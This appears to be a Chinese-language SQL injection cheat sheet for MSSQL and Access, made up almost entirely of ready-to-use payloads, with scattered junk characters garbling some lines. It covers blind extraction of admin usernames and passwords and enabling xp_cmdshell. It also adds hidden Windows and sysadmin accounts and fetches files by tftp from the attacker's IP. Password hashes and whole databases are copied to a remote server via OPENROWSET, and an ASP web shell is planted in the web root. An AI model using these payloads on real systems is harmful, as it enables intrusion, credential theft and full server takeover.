1.判断有无注入点
; and 1=1 and 1=2
2.猜表 一般的表的名称无非是admin、adminuser、user、pass、password 等。
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目 如果遇到 0< 返回正确页面、1< 返回错误页面,说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
猜列名还有 and (select count(列名) from 表名)>0
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称。
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换,直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
猜长度还有 and (select top 1 len(username) from admin)>5
6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
就这样一次加一个字符地猜,猜到你刚才猜出来的位数就对了,帐号就算出来了
猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和密码。只要把后面的数字换成中文的ASCII码就OK,最后把结果再转换成字符。
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )-- . w: A% Q+ E' x' H
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
UNION SELECT TOP 1 login_name FROM logintable-
% i- C @2 J! d7 O& OUNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
看服务器打的补丁=出错了说明打了SP4补丁
and 1=(select @@VERSION)--
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
and sa=(SELECT System_user)--
and user_name()=dbo--
and 0<>(select user_name()--
看xp_cmdshell是否被删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
xp_cmdshell被删除,恢复,支持绝对路径的恢复
0 o/ S, v0 ?3 v' p5 R* @;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- - O( A" ~ ^! a$ m* O
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- 7 c. f8 C. w* ^. M% O
& Q) w6 _% \! |2 {反向PING自己实验 2 o% q" }2 g, E( y4 H( e
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- * v3 ~/ F' |% D* y% d4 Z x& z, t
加帐号
& N& g4 F9 b0 n; R# B;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add-- ( d- T0 N$ x- w7 S1 \( x4 h
5 @) A6 Y. |* f# B x0 S Q
创建一个虚拟目录E盘:
* Z% ]6 N, O' x8 }- j$ k* ~% M;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- ! ^( B p3 N" p
访问属性:(配合写入一个webshell) c! ~- O3 ]& C4 u$ M& t
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse % L: A7 U ~3 n! F
MSSQL也可以用联合查询
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));-- ' Y% S( @* f: O0 c; z' u
and (select top 1 swappass from swap)=1-- . }- y j5 q0 j, k. `; c
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- + z0 [9 _. k/ a
;use ku1;-- 8 |0 r* `. X. D0 f1 T
;create table cmd (str image);-- 建立image类型的表cmd
存在xp_cmdshell的测试过程:
;exec master..xp_cmdshell dir ) ^0 M# p3 S. M8 A6 E
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
) i* k$ _! s X9 E% K;exec master.dbo.sp_password null,jiaoniang$,1866574;--
" V, ?4 y- K8 S1 ~1 ?" d$ L;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
: b) a, {* P0 d! N+ j9 _2 Z;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- 5 a6 u5 ]( Z3 T ?* E) A2 [
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
; I1 s0 a* j5 s2 U+ B- [exec master..xp_servicecontrol start, schedule 启动服务 % D8 ~* e8 ]% D8 y: |* F
exec master..xp_servicecontrol start, server 0 [; p: ~' w3 z
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
; @1 N; H5 h3 a. c \" D O" y- E;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
# h; S: Z: K6 l0 n/ b2 n9 E" F0 Y; O; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 " j. y; z- H5 z- r
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ % L$ g) e" P7 r
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
: N; P' N! e) @;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
如果被限制则可以。
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
查询构造:
SELECT * FROM news WHERE id=... AND topic=... AND .....
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
select 123;--
;use master;--
:a or name like fff%;-- 显示有一个叫ffff的用户哈。
and 1<>(select count(email) from [user]);--
" B! z* m% [! y6 O3 Y" F;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- ' i( y+ b/ w) u" S1 U2 `! @6 O0 V
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
2 ]% x( D, P7 K1 E6 X' f( @;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;-- + U! S9 p) o: r9 c/ W* O; O
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
/ @& t: g; a" b7 `5 g) L. a;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- 7 _3 i- G8 ]* I$ D p) l9 D
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;-- 7 ^5 [& L6 ]# m1 ~; v
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用户表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字
& V$ u: x) }0 s" n* c" N6 Y7 B; Tinsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- k/ s+ z" T9 A: z+ _
insert into users values( 667,123,123,0xffff)-- - e+ i# _& {" _- ^/ |; K9 d8 o5 x
insert into users values ( 123, admin--, password, 0xffff)-- " d4 V- `2 ? O6 e5 [, ^8 `
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access数据库
枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);-- $ v6 ]$ t3 u0 Q
这是将第一个表名更新到aaa的字段处。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- : G4 I2 `1 V1 R y' r
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,一个个的读出,直到没有为止。
读字段是这样:
* _7 ~' h4 n+ k1 M;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- : S( F7 p2 k0 o' z6 J
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
' p. @ G5 o; M" C& |! c) l;update aaa set aaa=(select top 1 col_name(object_id(表名),2));-- ! K* z4 f. }% A' V% p; X9 }
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
8 j; X% K z) M$ T6 j% x- D% h5 {/ Zupdate 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…) 8 @. s5 n$ m; z5 g
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
" b% p" \' D2 U% O; M8 i[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
7 s9 D& A3 x( l* F7 }) `: \" ^3 f2 m0 `5 oupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件] 7 t& T2 T5 | [/ B6 {
绕过IDS的检测[使用变量]
' R; J! p; U5 u' S( m# f;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ 3 h7 Q( q6 o! B0 p D
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ / U; F& ^& f( z+ `3 Y4 V
1、 开启远程数据库
基本语法
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以指定任意端口用来连接,比如
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
3.复制目标主机的整个数据库,insert所有远程表到本地表。
基本语法:
; s9 a0 \2 J2 Einsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 ' w, M# @) _) V
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
6 W% W' E! }5 R7 a7 A( H& F4 minsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) ! f) _/ a7 I( j5 w( F U
select * from master.dbo.sysdatabases
9 M, H* g5 H. Z( {, A! v0 [+ jinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects) + E" q& Z8 `/ h# o! e
select * from user_database.dbo.sysobjects
! c; o; b# ~7 e9 x; W4 J2 uinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
0 S6 V7 n; q0 G! |% p1 Eselect * from user_database.dbo.syscolumns * X* c) N2 a `, ~' u# V
复制数据库:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
. ~: F: x7 _0 Sinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 4 I2 v5 z2 ? ]/ u9 x1 q/ x% B
复制哈希表(HASH):登录密码的hash存储于sysxlogins中。方法如下:
) E: Y; s) B0 L; L0 a4 ainsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
得到hash之后,就可以进行暴力破解。
遍历目录的方法: 先创建一个临时表:temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并存入temp表中
9 A0 X+ [% _0 \6 A3 w6 f/ \# ];insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容 4 E# v% F8 Y/ n+ c
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
- c* E) L) X0 @+ a;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;-- * A6 j- l1 X, }. k- J1 Z6 g4 J6 n6 R
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
+ n2 q# B% o& b9 q;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) " ~ [# V; ?9 Q+ x
写入表:
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
语句9:and 1=(SELECT IS_MEMBER(db_owner));--
把路径写到表中去:
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree c:\--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree e:\web--
and 0<>(select top 1 paths from dirs1)--
把数据库备份到网页目录:下载
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;-- 1 s% t& m4 m- h6 S5 t. t
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
-=- wscript.shell example -=-
declare @o int
% @( L/ ~8 v9 e& P2 Gexec sp_oacreate wscript.shell, @o out
2 z, @8 `6 y2 V( Y( b, ` iexec sp_oamethod @o, run, NULL, notepad.exe : e/ K. n0 ]' D! o4 Y5 X$ Z
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
, Y. [- A0 Z4 z' Mdeclare @o int, @f int, @t int, @ret int * N) r$ z/ z7 T% I' S; M& ^
declare @line varchar(8000) 5 F: v: h, ~% ]( r
exec sp_oacreate scripting.filesystemobject, @o out
7 A- m* w% U, O9 c$ A* a `: Vexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 / ^* O/ w. _- _% }0 x1 P' m- S6 H! G& M
exec @ret = sp_oamethod @f, readline, @line out ! g' z! [: v: r5 [3 I9 w
while( @ret = 0 ) " T; O5 W% ~) W# c6 N e) q
begin
6 e8 S( K' A7 u' Z3 l" e8 Pprint @line 6 N4 |% g" @, ^" y
exec @ret = sp_oamethod @f, readline, @line out
% h) B* }7 Q' G/ C4 b3 zend 5 J5 e6 O5 G: S* O* b& d$ X
declare @o int, @f int, @t int, @ret int
8 w( U- i$ v9 a" c& S2 {9 Jexec sp_oacreate scripting.filesystemobject, @o out 0 q5 w" |% R% z0 c+ j4 M1 W9 \
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 ; z4 V+ Z& N7 j
exec @ret = sp_oamethod @f, writeline, NULL,
8 ^0 P! I) l& N+ K5 f<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
declare @o int, @ret int 1 B, M3 W" ?# h& J! Z9 ~( T
exec sp_oacreate speech.voicetext, @o out - N! }* u: a4 c* X' x. F
exec sp_oamethod @o, register, NULL, foo, bar 5 [. V$ a4 r! x+ ?; U% J ?4 n) s$ l
exec sp_oasetproperty @o, speed, 150
) ~/ b* \- b4 ^6 }/ o9 e Gexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 6 D6 h% T( ]% u3 |
waitfor delay 00:00:05 0 U3 V* k$ K8 j1 `1 @0 _
4 G, B0 A* q) g3 v+ C' Z2 d; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
xp_dirtree适用权限PUBLIC
exec master.dbo.xp_dirtree c: 返回的信息有两个字段subdirectory、depth。subdirectory字段是字符型,depth字段是整型字段。
create table dirs(paths varchar(100), id int)
建表,这里建的表和上面xp_dirtree相关联,字段数相等、类型相同。
insert dirs exec master.dbo.xp_dirtree c: 只要我们建的表与存储过程返回的字段定义相等就能够执行!达到写表的效果,一步步得到我们想要的信息!
* j( A4 p, c6 u1 A, U$ F$ o |